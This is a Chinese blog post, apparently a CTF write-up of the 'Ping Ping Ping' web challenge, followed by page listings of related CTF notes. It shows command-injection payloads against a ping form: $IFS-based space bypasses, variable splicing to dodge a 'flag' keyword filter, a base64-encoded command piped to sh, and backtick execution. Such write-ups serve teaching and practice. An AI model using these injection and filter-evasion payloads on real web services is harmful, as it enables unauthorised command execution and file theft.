2021-08-23

最新推荐文章于 2022-08-02 15:13:54 发布
最新推荐文章于 2022-08-02 15:13:54 发布
阅读量147 收藏
点赞数
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huling18/article/details/119878407
版权

第二天——Ping Ping Ping

在这里插入图片描述熟悉的ping,先尝试随便写一个命令

payload=1;ls

在这里插入图片描述所以是有的,直接cat flag.php试一下
在这里插入图片描述空格过滤,尝试几种常见的绕过:

cat flag.txt

cat${IFS}flag.txt

cat$IFS$9flag.txt
cat<flag.txt
cat<>flag.txt

第三个才可以,但又会显示
在这里插入图片描述

其余几个显示
在这里插入图片描述

所以还有其余过滤,可以先看一下index.php
在这里插入图片描述
发现有其余过滤,符号过滤了一大堆,还有flag的贪心匹配的黑名单;
首先想到通配符,发现*也被过滤了,那就用变量拼接,只要flag不按顺序出现就可以了。

payload=?ip=1||a=fl;b=g;c=a;d=.;e=p;f=h;r=$a$c$b$d$e$f$e;cat$IFS$9$r

在这里插入图片描述迷惑两秒钟,应该要出现flag的呀,后来发现自己傻了,既然是php文件,很可能是被注释掉了的,直接看页面看不到,要看源码。果然
在这里插入图片描述后来看网上的writeup还有一种绕过方式,是加密

payload=?ip=1;echo$IFS$9Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh

echo$IFS$1Y2F0IGZsYWcucGhw是cat flag.php的base64
或者

payload=?ip=1;cat$IFS$9`ls`

这种时内联执行,将反引号内命令的输出作为输入执行

0h0
关注
专栏目录
Linux cat命令详解
折翼飞翔
05-11 18万+
cat命令是linux下的一个文本输出命令,通常是用于观看某个文件的内容的; cat主要有三大功能: 1.一次显示整个文件。 $ cat   filename 2.从键盘创建一个文件。 $ cat  >  filename 只能创建新文件,不能编辑已有文件. 3.将几个文件合并为一个文件。 $cat   file1   file2  > file cat具体命令格式为 : cat
BUUCTF_WriteUp 2021-08-23
m0_56897090的博客
08-23 387
2021-08-23 文章目录2021-08-23shell_asm题目描述题目分析BabyROP题目描述解题思路0x01 整体思路0x02 额外前置知识:0x03 expnot_the_same_3dsctf_20160x01 解题思路0x02 expBJDCTF-babystack0x01 解题思路0x02 Expjarvisoj_level20x01 整体分析0x02 exp32位0x03 64位解法get_started_3dsctf_20160x01 程序整体分析预期解法解法2:mprotectc
Linux系统下绕过某个关键字的小技巧,比如flag关键字
weixin_44632787的博客
07-24 2166
Linux系统下绕过某个关键字的小技巧,比如绕过flag关键字 首先先在linux系统下创建一个文件名为flag.txt的文件。里面的内容为:This is Flag! 这里提供几个绕过某个关键字的小技巧。 单引号绕过: cat fla’g’.txt 双引号绕过: cat fla"g".txt 反斜线绕过: cat f\lag.txt $+数字绕过: cat fl$1ag.txtcat fl$2ag.txtcat fl$3ag.txt $@绕过: cat fl$@ag.txt Base6
CTF自学笔记
u011005040的博客
06-21 2186
CTF自学笔记第一章:课程介绍与环境搭建1.课程介绍2.环境搭建第二章:CTF训练 SSH服务1.CTF-SSH私钥泄露信息探测分析探测结果探测大端口的信息 第一章:课程介绍与环境搭建 1.课程介绍 CTF比较中涉及内容比较复杂,我们要利用所有可以利用的资源获取flag。 2.环境搭建 安装软件:(都是数据库软件) vmware workstation 14 Virtual box 测试靶场网络环境: 1.使用 netdiscover -r ip/netmask 嗅探靶场IP (例:netdiscove
cat-flag解析
weixin_43404314的博客
04-19 3157
点开图片,发现是由两种不同的猫咪组成的,尝试用WinHex解析,发现没有用,看了其他正确解析,才知道其实是二进制转字符,将其转化成二进制SACII码进行解码即可得flag 二进制转字符可参考https://baike.sogou.com/v57727847.htm?fromTitle=%E4%BA%8C%E8%BF%9B%E5%88%B6ASCII%E7%A0%81 ...
MISC解题思路总结(一)XCTF平台
gou1791241251的博客
08-02 3443
CTF中的misc解题思路
lindexi#lindexi#2021-08-23-WPF-推荐一个剪贴板内容查看工具1
07-25
title: "WPF 推荐一个剪贴板内容查看工具"本文来安利大家一个好用的 Windows 剪贴板的内容查看工具这是在 GitHub 上完全免费开源的应用,由
SDFZ-0365-2021中国科技出行企业“碳中和”发展研究报告final_2021-08-23-60页.pdf
09-25
SDFZ-0365-2021中国科技出行企业“碳中和”发展研究报告final_2021-08-23-60页
2021-08-23英雄战争代码源
zhengheda的博客
08-23 3591
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="zh-CN"> <head> <meta charset="utf-8"> <meta name="viewport" cont
2021-08-23。weibull可靠性研究
qq_38844711的博客
08-23 2537
韦伯分布(Weibull distribution) 一般用来统计可靠性或寿命检验时用,例如:预计在有效寿命阶段有多少次保修索赔?预计将在 8 小时老化期间失效的保险丝占多大百分比? 在管理科学与工程领域,见到一些学者假定产品的需求为韦伯分布。因为正态分布或者泊松分布过于理想化,韦伯分布相对来说更接近现实一些(从概率密度函数来看,韦伯分布一般具有长尾分布,即右偏分布的特点)。 韦伯分布的概率密度函数为: 其中, x x x 是随机变量, λ \lambda λ 是比例参数(scale), k k k 是形
cat命令读取一部分_命令注入绕过方式总结
weixin_42373789的博客
01-30 1874
前言命令注入是web中常见的漏洞之一,由于web应用程序未对用户提交的数据做严格的过滤,导致用户输入可以直接被linux或windows系统当成命令执行,一般都会造成严重的危害。常用符号分号(;)多条语句顺序执行时的分割符号。1cmd1;cmd2管道符(|)cmd1命令的输出,作为下一条命令cmd2的参数。1cmd1|cmd2and(&&)与命令,cmd1成功则执行cmd...
自动获取flag
zheng_ruiguo的专栏
04-23 1086
''' scanFlag.py 自动获取flag by 郑瑞国 ''' import paramiko import webbrowser import threading import time def webConnect(ip): webbrowser.open('http://'+ip+'/html/WebShell.php') time.sleep(0.5) def...
catflag套神的传人
zip471642048的博客
12-18 1339
题目是一个套了400多层的压缩包,仔细观察就可以发现压缩包的名称是16进制,我们先使用脚本把压缩包递归解压。 import zipfile import os file_path = input('path : ')#压缩包路径 path = file_path[0:len(file_path)-len(file_path.split('\\')[-1])] n = 0 s2 = "" #"C:\Users\63606\Desktop\CTF\CTF\VFree\MISC\secret\272B3B797
docker本机容器性能监控
helpapa的博客
09-11 450
docker原生命令docker stats [container] Sematext工具Sematext文档 操作流程:sematext.com/ui注册账号并登录 选择docker,填写名称,Continue。 按照提示拉取镜像并生成容器。ps:如果run命令报错则先将命令粘贴到txt里去掉换行和\再执行 ...
攻防世界 web 新手题小结
Sk1y的博客
10-20 2万+
01view_source 方法:在下用的firefox,鼠标右键可查看页面源代码,试了试不行。那么F12,即可得到。01收获:鼠标右键不能用,与前端函数有关,在该页面中我们可以发现有这两个函数, 1. document.oncontextmenu=new Function("return false")是右键菜单禁用; 2. document.onselectstart=new Function("return false")是禁止选中页面上的内容; 3. document.onselectsta
攻防世界之WEB新手练习区(更新至11)
HHH's Blogs
08-09 1万+
001 view_source
在CTF比赛中,命令中空格被过滤的解决方法
a3320315的博客
08-19 6923
1、linux {cat,flag.txt} cat${IFS}flag.txt cat$IFS$9flag.txt cat<flag.txt cat<>flag.txt kg=$'\x20flag.txt'&&cat$kg (\x20转换成字符串就是空格,这里通过变量的方式巧妙绕过) 2、windows下 (实用性不是很广,也就type这个命令可以用) ty...
【CTF】CTF 中绕过空格的奇淫技巧
边扯边淡
11-16 2060
起序:学到了,技巧太骚了,总结一下。 ${IFS} $IFS$9 < <> {,} cat flag.txt cat${IFS}flag.txt cat$IFS$9flag.txt cat<flag.txt cat<>flag.txt {cat,flag.txt} 如果对您有帮助,点个赞再走吧。
百度杯CTF Write up集锦 WEB篇
热门推荐
4ct10n
09-21 4万+
九月场1.code一开始的URL为http://ace3c302efed4a9094cbac1dff0250e8add1b4b45f8249d4.game.ichunqiu.com/index.php?jpg=hei.jpg尝试着令jpg=index.php得出了base64编码的文本 丢到解码器里解出文本index.php<?php /** * Created by PhpStorm. *
Java LocalDateTime 转这个时间格式2021-08-18T23:59:59+08:00
最新发布
09-24
如果你想将其转换成 `2021-08-18T23:59:59+08:00` 这种带有时区偏移的时间格式,可以使用`ZonedDateTime` 类并结合`DateTimeFormatter`来进行格式化。 首先,你需要将 `LocalDateTime` 和特定时区关联起来,然后...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值